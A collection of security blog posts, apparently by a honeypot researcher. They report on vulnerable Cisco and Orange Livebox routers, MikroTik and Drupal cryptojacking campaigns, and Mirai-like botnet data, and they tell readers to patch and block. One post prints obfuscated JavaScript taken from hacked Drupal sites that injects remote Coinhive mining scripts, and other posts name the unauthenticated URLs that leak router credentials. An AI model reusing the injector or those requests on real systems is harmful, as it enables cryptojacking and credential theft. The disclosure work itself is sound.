Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653

On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability exists in these routers that allow remote unauthenticated information disclosure (CVE-2019-1653) leading to remote code execution (CVE-2019-1652).

These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.

All configuration details of the RV320/RV325 router are exposed by this vulnerability.
All configuration settings of the RV320/RV325 routers are exposed by this vulnerability.

Using data provided by BinaryEdge, we’ve scanned  15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

  • 6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
    (1,650 are not vulnerable and 1,955 did not respond to our scans)
  • 3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
    (1,027 are not vulnerable and 1,020 did not respond to our scans)
Of the vulnerable routers found, most were located in the United States.
Of the vulnerable routers found, most were located in the United States.

This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).

These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).

These vulnerabilities affect Cisco RV320/RV325 routers running firmware releases and Cisco has released a patch for these routers that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.

Closing remarks

Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.

Additional updates

Update 2019-01-27:
We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.

Update 2019-01-28:
We’ve shared our findings with ACSCCanadian Centre for Cyber Security, CCBCERT.atCLCERTNCSC and Z-CERT.

Update 2019-01-29:
We’ve shared our findings with ANSSI/COSSI/CERT-FRCSIRT-IE, CERT-PT, and SK-CERT.

Update 2019-01-30:
Cisco PSIRT confirmed receipt of our report of vulnerable Cisco RV320/RV325 routers. We’ve also shared our findings with INCIBE-CERT.

Our honeypots detected incoming scans from new unique hosts checking for vulnerable Cisco RV320/RV325 routers.

Update 2019-01-31:
US-CERT / CISA confirmed receipt of our report and advised their Technical Analysis Branch is reviewing.

Update 2019-02-01:
We’ve shared our findings with CERT Polska.

Our honeypots detected incoming scans from a new unique host checking for Cisco RV320/RV325 routers vulnerable to CVE-2019-1653.

Over 19,000 Orange Livebox ADSL modems are leaking their WiFi credentials

On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allow remote unauthenticated users to obtain the device’s SSID and WiFi password.

curl request to an affected Orange Livebox ADSL modem
A simple GET request to “/get_getnetworkconf.cgi” will reveal the Orange Livebox modem’s WiFi credentials in plaintext.

To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.

Of the 30,063 IPv4 hosts found, our scans revealed:

  • 19,490 leaking their WiFi credentials (SSID/password) in plaintext
  • 2,018 not leaking any information, but still exposed to the internet
  • 8,391 not responding to our scans

Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.

Example Livebox modem status page
Poorly secured Livebox modems enable remote users to view the customer’s phone number, the name/MAC address of all connected clients, and more.

This allows allow any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.

Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).

Total affected Livebox modems

Initial scan source

The initial scan for Orange Livebox modems came from

The initial scan detected by our honeypots came from which is an IP address associated to a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems than say a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.

Closing remarks

Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly, however is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.

Update 4:00 AM PT: Orange-CERT has acknowledged our report and is investigating further.

Update 6:00 PM PT: CVE-2018-20377 has been assigned for the flaw described in this post.

Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:

  • 00.96.807
  • 00.96.322

These versions are not and are vulnerable to CVE-2018-20377:

  • 00.96.321S
  • 00.96.217

Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.

200,000+ MikroTik routers worldwide have been compromised to inject cryptojacking malware

Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands devices remain compromised.

These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. A patch was issued earlier this year by MikroTik, however the latest statistics (above) reveal device owners and network operators have chosen not to apply it.

Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over a 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.’

Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.

However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.

Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.
Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.

While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.

In this campaign, CoinImp is injected via https://srcip[.]com/src.js which embeds an iframe pointing to https://srcip[.]com/js.html which contains the cryptocurrency mining JavaScript code.

CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.

Another cryptojacking campaign seemingly running rampant was discovered earlier in September.

In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking 30% of the revenue of their users. Unlike Coinhive, the websocket traffic is not in plain text (shown in tweet above).

Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.

United States cryptojacking campaigns

Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.

Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.

Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement as these routers on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.

It’s alarming to see so many devices on a public utilities’ network compromised, so I hope the NCCIC is able provide them with guidance and/or assistance with the remediation process.

The latest results found on Censys indicate cryptojacking campaigns targeting vulnerable MikroTik routers in the United States is not slowing down. Many Wireless Internet Service Providers (WISPs) appear to affected as numerous compromised devices can be found on their networks.


Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.

Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.

Closing remarks

As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can used for much more nefarious purposes such as eavesdropping all traffic passing through them.

MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I’ve also coauthored a peer-reviewed research paper, A first look at browser-based cryptojacking.

As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.

Author’s note

The statistics shared in this post were accurate as of September 28, 2018. Since then, the amount of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.

How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking
High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.
Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript executing cryptomining behavior. It’s available for Chrome, Firefox, and is open source.


Another effective method to stop cryptojacking is at the network level (firewall) to prevent the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For MacOS users, this guide illustrates how the CoinBlockerLists can be implemented using firewall software Little Snitch. Other methods such as DNS filtering using Pi-hole can be used with the CoinBlockerLists.

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinming malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.

PRTG logo

Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of the PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s Office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also setup PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA , “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs

Coinhive Site Keys

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal. Using an outdated content management system (CMS) is never best practice.

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd[.]com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IOCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.

The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon.

Unique domains found by countryUnique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo's portal page.
Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency
Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness  of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

var RqLm1=window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0];var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x74x79x70x65"]='x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74';D2["x69x64"]='x6dx5fx67x5fx61';D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';RqLm1["x61x70x70x65x6ex64x43x68x69x6cx64"](D2);

var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();


Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcast

Packet Pushers logo

For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of Politifact.com was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast


The CoinSec Podcast logo

The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter – follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

My favorite website scanning services

In my research, I primarily use two publicly available website scanning services: urlscan.io and Sucuri SiteCheck. These tools allow me to quickly locate malicious code, which usually consists of Coinhive. However, many other types of cryptocurrency mining scripts are in use today.

While Coinhive remains the market leader for now, their dominance in the cryptojacking “industry” has declined in 2018.

I recently documented how to find cryptojacking malware and recommend it as an excellent use case for the services offered by PublicWWW.

Website Scanning Services

My first choice for scanning and archiving a website’s source code is urlscan.io. I’ve provided many examples of how valuable this service in on Twitter.

Cryptojacking detection was added to urlscan.io early in January 2018. This enables you check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).

It’s also a useful when you search for a URL to check if a website was previously infected.

Coinhive was found on the website of LonelyPlanet.com
The archived urlscan.io results show Coinhive was found on LonelyPlanet.com

In a recent example, the official website of travel guide book website Lonely Planet was compromised to run Coinhive. Despite numerous contact attempts, I received no confirmation or denial from Lonely Planet regarding this incident. However, based on the Archive.org copy of the affected JavaScript library, Coinhive was removed sometime on or after March 7, 2018.

Another valuable tool for scanning websites for cryptojacking malware is Sucuri SiteCheck. Sucuri is a security company, owned by GoDaddy, that I have no affiliation with. I do however like using their website scanning service.

Sucuri SiteCheck

This scanning service helps you quickly locate the source of the malicious code. Other forms of malware can be detected by Sucuri’s scanner and isn’t limited to cryptojacking.

Sucuri SiteCheck

In this example, the website is infected with malware that redirects users to a tech support scam site. The offending code is easy to find thanks to the results presented by Sucuri. Sadly, this was only one of many Drupal sites that were recently exploited.

Closing Remarks

While Coinhive’s market share has declined in 2018, cryptojacking malware as a whole remains a persistent threat.

To stop cryptojacking in your browser, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware.

If you use other forms of blocking, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Mirai-like Botnet One Year Review and a New Website!

In February 2017, I started my passive honeypot and began listening for all incoming network traffic. As the months passed, I saw numerous exploit attempts, constant port scans, and other suspicious traffic. It wasn’t until October that, with the help of Dr. Neal Krawetz, I started cataloging Mirai-like botnet traffic specifically.

What does Mirai-like mean?

Incoming scans from Mirai-like botnets have a very distinct fingerprint in the network traffic generated by infected hosts. The TCP sequence number will always equal the IP address of the target device. This intentional behavior is documented in the original Mirai source code, shown in the snippet below:

Snippet of Mirai source code

Typically, the target IP address is encoded in decimal (numeric) format. As the target IP changes, the Sequence Number of the traffic coming from the infected host will change accordingly as shown in the example below:

Example showing TCP Sequence Number = Destination IP address

Your logs may vary and instead record the sequence number in hexadecimal format. Either way, once converted to an IP address, the pattern is clearly established.

Dr. Krawetz shared his thoughts on this technique, “This is actually kind of brilliant. Each bot slings out packets and doesn’t store any information. When a response comes back, the botnet can identify the sender by the sequence number. ”

Once the fingerprint of the Mirai-like botnet was established, I was able to review the IP addresses found my logs for further patterns. Late in October 2017, I shared my findings of a botnet consisting of EnGenius routers.

Instead of continuing to isolate specific devices in the botnet and the volume of traffic generated, I began cataloging new unique IP addresses while noting the network provider (ASN) and country they came from. This allowed me to gauge the growth rate and estimate the size of active botnets. Subsequently, I started sharing my Mirai-like botnet statistics daily on Twitter.

One Year of Data Collected

New unique IP addresses seen Mirai-like botnet from 2017-02-19 to 2018-02-19

Reviewing the entire dataset I collected, the overall Mirai-like botnet volume averaged around 500 new unique IP addresses per day in March 2017 and steadily declined until September 2017. After this point, a surge in botnet activity was observed. The most new unique IP addresses I saw in a single day was 1,384 on November 29.

The explosion in activity was largely attributed to the Satori botnet which enslaved devices in Argentina, Egypt, Colombia, and Tunisia. This botnet grew exponentially after a zero day exploit was used to target Huawei HG532 routers. Numerous devices from Japan were also found after a UPnP exploit targeting Realtek devices was used.

During the height of the activity between November 22nd and December 7th, those countries accounted for a large share of the new unique IP addresses found.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by Country

Similarly, network providers (ASNs) from Colombia, Egypt, and Argentina combined for 39% of all new unique IP addresses seen during this time period.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by ASN

Growing Pains

The challenge of collecting and sharing the Mirai-like botnet data every day quickly became apparent. A publicly shared Google Sheet was not a long term option, so I asked my Twitter followers for assistance building a proper solution.

Alex Rhodes rose to the challenge and offered his time and expertise to build a database backend to store the data. He also designed and implemented a website for sharing the botnet data. Alex is software engineer in the aerospace industry and is currently working towards a Master’s degree in Cybersecurity at Syracuse University.

The new website is easy to configure and manage and I’m truly grateful for the finished product Alex has delivered. Read more about Alex’s work on this project here.


New website: mirai.badpackets.net

The new website offers filtering options for every field, including IP Address, Country, ASN, and date range. It also expands on the features formerly offered in the spreadsheet, including the following lookups:

IP address (DomainTools)
ASN (Hurricane Electric BGP Toolkit)

In addition to the main page, which is updated daily, we can also filter by the top ASN and country for a specified time period. Using this, we can review the all-time leaders for the entire year of Mirai-like botnet data collected.

